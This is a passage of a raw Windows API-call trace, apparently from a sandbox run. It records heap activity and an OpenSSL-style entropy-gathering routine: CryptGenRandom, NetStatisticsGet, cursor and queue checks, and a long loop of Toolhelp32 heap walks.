Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0180.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0180.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0180.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0180.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fec8 [0180.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0180.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5a0 [0180.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44368 [0180.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e5b8 [0180.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e588 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e540 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443a8 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e510 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e528 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e570 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0180.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e558 [0180.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0180.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5e8 [0180.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e600 [0180.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0180.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0180.537] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d301d0 [0180.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d43198 [0180.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0180.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e600 | out: hHeap=0x6a0000) returned 1 [0180.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5e8 | out: hHeap=0x6a0000) returned 1 [0180.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0180.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43198 | out: hHeap=0x6a0000) returned 1 [0180.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5e8 [0180.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0180.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e600 [0180.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44708 [0180.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e5d0 [0180.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0180.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0180.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b30 [0180.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0180.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0180.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0180.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0180.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0180.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0180.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e600 | out: hHeap=0x6a0000) returned 1 [0180.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0180.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0180.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44708 | out: hHeap=0x6a0000) returned 1 [0180.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0180.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5e8 | out: hHeap=0x6a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b30 | out: hHeap=0x6a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d301d0 | out: hHeap=0x6a0000) returned 1 [0180.874] GetCurrentThreadId () returned 0x264 [0180.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x190) returned 0x2c4b9d0 [0180.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0180.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0180.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5e8 [0180.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0180.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cdcc0 [0180.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0180.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0180.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x6d5c88 [0180.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0180.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0180.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0180.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0180.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0180.992] GetCurrentThreadId () returned 0x264 [0180.992] GetVersionExA (in: lpVersionInformation=0x30ff380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x2a, dwBuildNumber=0x6d5c80, dwPlatformId=0x6a0000, szCSDVersion="à]m") | out: lpVersionInformation=0x30ff380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0180.992] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x75780000 [0180.992] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76680000 [0180.992] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x74760000 [0181.305] GetProcAddress (hModule=0x74760000, lpProcName="NetStatisticsGet") returned 0x7476644f [0181.306] GetProcAddress (hModule=0x74760000, lpProcName="NetApiBufferFree") returned 0x748813d2 [0181.306] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x30ff02c | out: Buffer=0x30ff02c) returned 0x0 [0181.324] GetCurrentThreadId () returned 0x264 [0181.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.325] NetApiBufferFree (Buffer=0x2c40050) returned 0x0 [0181.325] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x30ff02c | out: Buffer=0x30ff02c) returned 0x0 [0181.332] GetCurrentThreadId () returned 0x264 [0181.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.332] NetApiBufferFree (Buffer=0x2bf9c38) returned 0x0 [0181.332] FreeLibrary (hLibModule=0x74760000) returned 1 [0181.335] GetProcAddress (hModule=0x75780000, lpProcName="CryptAcquireContextW") returned 0x7578df14 [0181.335] GetProcAddress (hModule=0x75780000, lpProcName="CryptGenRandom") returned 0x7578dfc8 [0181.335] GetProcAddress (hModule=0x75780000, lpProcName="CryptReleaseContext") returned 0x7578e124 [0181.335] CryptAcquireContextW (in: phProv=0x30ff018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ff018*=0x6ea898) returned 1 [0181.337] CryptGenRandom (in: hProv=0x6ea898, dwLen=0x40, pbBuffer=0x30ff464 | out: pbBuffer=0x30ff464) returned 1 [0181.337] GetCurrentThreadId () returned 0x264 [0181.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.338] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0181.338] CryptAcquireContextW (in: phProv=0x30ff018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x30ff018*=0x6ea898) returned 0 [0181.338] FreeLibrary (hLibModule=0x75780000) returned 1 [0181.338] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0181.339] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0181.339] GetDesktopWindow () returned 0x10010 [0181.339] GetProcessWindowStation () returned 0x5c [0181.339] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x30fefa0 | out: pvInfo=0x0, lpnLengthNeeded=0x30fefa0) returned 0 [0181.339] GetLastError () returned 0x7a [0181.354] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x30fef80, nLength=0x10, lpnLengthNeeded=0x30fefa0 | out: pvInfo=0x30fef80, lpnLengthNeeded=0x30fefa0) returned 1 [0181.355] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75330000 [0181.355] GetProcAddress (hModule=0x75330000, lpProcName="GetForegroundWindow") returned 0x75352320 [0181.355] GetProcAddress (hModule=0x75330000, lpProcName="GetCursorInfo") returned 0x753a812f [0181.356] GetProcAddress (hModule=0x75330000, lpProcName="GetQueueStatus") returned 0x75353924 [0181.356] GetForegroundWindow () returned 0x10066 [0181.356] GetCurrentThreadId () returned 0x264 [0181.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.357] GetCursorInfo (in: pci=0x30ff450 | out: pci=0x30ff450) returned 1 [0181.358] GetQueueStatus (flags=0xbf) returned 0x0 [0181.358] GetCurrentThreadId () returned 0x264 [0181.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.358] FreeLibrary (hLibModule=0x75330000) returned 1 [0181.359] GetProcAddress (hModule=0x76680000, lpProcName="CreateToolhelp32Snapshot") returned 0x766b7327 [0181.359] GetProcAddress (hModule=0x76680000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0181.359] GetProcAddress (hModule=0x76680000, lpProcName="Heap32First") returned 0x76715d03 [0181.359] GetProcAddress (hModule=0x76680000, lpProcName="Heap32Next") returned 0x76715eee [0181.359] GetProcAddress (hModule=0x76680000, lpProcName="Heap32ListFirst") returned 0x76715bc1 [0181.360] GetProcAddress (hModule=0x76680000, lpProcName="Heap32ListNext") returned 0x76715c6b [0181.360] GetProcAddress (hModule=0x76680000, lpProcName="Process32First") returned 0x766b8abb [0181.360] GetProcAddress (hModule=0x76680000, lpProcName="Process32Next") returned 0x766b8812 [0181.360] GetProcAddress (hModule=0x76680000, lpProcName="Thread32First") returned 0x76716133 [0181.361] GetProcAddress (hModule=0x76680000, lpProcName="Thread32Next") returned 0x767161df [0181.361] GetProcAddress (hModule=0x76680000, lpProcName="Module32First") returned 0x76716279 [0181.361] GetProcAddress (hModule=0x76680000, lpProcName="Module32Next") returned 0x76716362 [0181.361] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x594 [0181.373] GetTickCount () returned 0xda84 [0181.373] Heap32ListFirst (hSnapshot=0x594, lphl=0x30ff454) returned 1 [0181.374] GetCurrentThreadId () returned 0x264 [0181.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.375] Heap32First (lphe=0x30fefc0, th32ProcessID=0x7d8, th32HeapID=0x6a0000) returned 1 [0181.409] GetCurrentThreadId () returned 0x264 [0181.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.409] Heap32Next (lphe=0x30fefc0) returned 1 [0181.438] GetTickCount () returned 0xdac2 [0181.438] GetCurrentThreadId () returned 0x264 [0181.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.438] Heap32Next (lphe=0x30fefc0) returned 1 [0181.466] GetTickCount () returned 0xdae1 [0181.466] GetCurrentThreadId () returned 0x264 [0181.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.467] Heap32Next (lphe=0x30fefc0) returned 1 [0181.495] GetTickCount () returned 0xdb00 [0181.495] GetCurrentThreadId () returned 0x264 [0181.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.496] Heap32Next (lphe=0x30fefc0) returned 1 [0181.520] GetTickCount () returned 0xdb10 [0181.520] GetCurrentThreadId () returned 0x264 [0181.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.520] Heap32Next (lphe=0x30fefc0) returned 1 [0181.556] GetTickCount () returned 0xdb2f [0181.556] GetCurrentThreadId () returned 0x264 [0181.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.557] Heap32Next (lphe=0x30fefc0) returned 1 [0181.581] GetTickCount () returned 0xdb4e [0181.581] GetCurrentThreadId () returned 0x264 [0181.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.581] Heap32Next (lphe=0x30fefc0) returned 1 [0181.606] GetTickCount () returned 0xdb6e [0181.606] GetCurrentThreadId () returned 0x264 [0181.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.606] Heap32Next (lphe=0x30fefc0) returned 1 [0181.628] GetTickCount () returned 0xdb7d [0181.628] GetCurrentThreadId () returned 0x264 [0181.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.629] Heap32Next (lphe=0x30fefc0) returned 1 [0181.650] GetTickCount () returned 0xdb9c [0181.650] GetCurrentThreadId () returned 0x264 [0181.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.651] Heap32Next (lphe=0x30fefc0) returned 1 [0181.673] GetTickCount () returned 0xdbac [0181.673] GetCurrentThreadId () returned 0x264 [0181.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.674] Heap32Next (lphe=0x30fefc0) returned 1 [0181.694] GetTickCount () returned 0xdbbc [0181.694] GetCurrentThreadId () returned 0x264 [0181.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.695] Heap32Next (lphe=0x30fefc0) returned 1 [0181.717] GetTickCount () returned 0xdbdb [0181.717] GetCurrentThreadId () returned 0x264 [0181.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.717] Heap32Next (lphe=0x30fefc0) returned 1 [0181.737] GetTickCount () returned 0xdbea [0181.737] GetCurrentThreadId () returned 0x264 [0181.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.738] Heap32Next (lphe=0x30fefc0) returned 1 [0181.761] GetTickCount () returned 0xdc0a [0181.761] GetCurrentThreadId () returned 0x264 [0181.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.762] Heap32Next (lphe=0x30fefc0) returned 1 [0181.788] GetTickCount () returned 0xdc19 [0181.788] GetCurrentThreadId () returned 0x264 [0181.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.788] Heap32Next (lphe=0x30fefc0) returned 1 [0181.810] GetTickCount () returned 0xdc38 [0181.810] GetCurrentThreadId () returned 0x264 [0181.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.810] Heap32Next (lphe=0x30fefc0) returned 1 [0181.833] GetTickCount () returned 0xdc48 [0181.833] GetCurrentThreadId () returned 0x264 [0181.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.833] Heap32Next (lphe=0x30fefc0) returned 1 [0181.858] GetTickCount () returned 0xdc67 [0181.858] GetCurrentThreadId () returned 0x264 [0181.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.858] Heap32Next (lphe=0x30fefc0) returned 1 [0181.882] GetTickCount () returned 0xdc77 [0181.882] GetCurrentThreadId () returned 0x264 [0181.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.883] Heap32Next (lphe=0x30fefc0) returned 1 [0181.907] GetTickCount () returned 0xdc96 [0181.907] GetCurrentThreadId () returned 0x264 [0181.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.907] Heap32Next (lphe=0x30fefc0) returned 1 [0181.928] GetTickCount () returned 0xdca6 [0181.928] GetCurrentThreadId () returned 0x264 [0181.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.929] Heap32Next (lphe=0x30fefc0) returned 1 [0181.950] GetTickCount () returned 0xdcc5 [0181.950] GetCurrentThreadId () returned 0x264 [0181.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.951] Heap32Next (lphe=0x30fefc0) returned 1 [0181.973] GetTickCount () returned 0xdcd4 [0181.973] GetCurrentThreadId () returned 0x264 [0181.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.974] Heap32Next (lphe=0x30fefc0) returned 1 [0181.994] GetTickCount () returned 0xdcf4 [0181.994] GetCurrentThreadId () returned 0x264 [0181.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0181.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0181.995] Heap32Next (lphe=0x30fefc0) returned 1 [0182.018] GetTickCount () returned 0xdd03 [0182.018] GetCurrentThreadId () returned 0x264 [0182.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.018] Heap32Next (lphe=0x30fefc0) returned 1 [0182.038] GetTickCount () returned 0xdd13 [0182.039] GetCurrentThreadId () returned 0x264 [0182.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.039] Heap32Next (lphe=0x30fefc0) returned 1 [0182.062] GetTickCount () returned 0xdd32 [0182.062] GetCurrentThreadId () returned 0x264 [0182.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.063] Heap32Next (lphe=0x30fefc0) returned 1 [0182.084] GetTickCount () returned 0xdd42 [0182.084] GetCurrentThreadId () returned 0x264 [0182.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.084] Heap32Next (lphe=0x30fefc0) returned 1 [0182.116] GetTickCount () returned 0xdd61 [0182.116] GetCurrentThreadId () returned 0x264 [0182.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.116] Heap32Next (lphe=0x30fefc0) returned 1 [0182.138] GetTickCount () returned 0xdd80 [0182.138] GetCurrentThreadId () returned 0x264 [0182.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.138] Heap32Next (lphe=0x30fefc0) returned 1 [0182.159] GetTickCount () returned 0xdd90 [0182.159] GetCurrentThreadId () returned 0x264 [0182.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.160] Heap32Next (lphe=0x30fefc0) returned 1 [0182.188] GetTickCount () returned 0xddaf [0182.188] GetCurrentThreadId () returned 0x264 [0182.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.189] Heap32Next (lphe=0x30fefc0) returned 1 [0182.216] GetTickCount () returned 0xddce [0182.216] GetCurrentThreadId () returned 0x264 [0182.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.217] Heap32Next (lphe=0x30fefc0) returned 1 [0182.255] GetTickCount () returned 0xdded [0182.255] GetCurrentThreadId () returned 0x264 [0182.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.256] Heap32Next (lphe=0x30fefc0) returned 1 [0182.285] GetTickCount () returned 0xde0c [0182.285] GetCurrentThreadId () returned 0x264 [0182.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.286] Heap32Next (lphe=0x30fefc0) returned 1 [0182.328] GetTickCount () returned 0xde3b [0182.328] GetCurrentThreadId () returned 0x264 [0182.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.329] Heap32Next 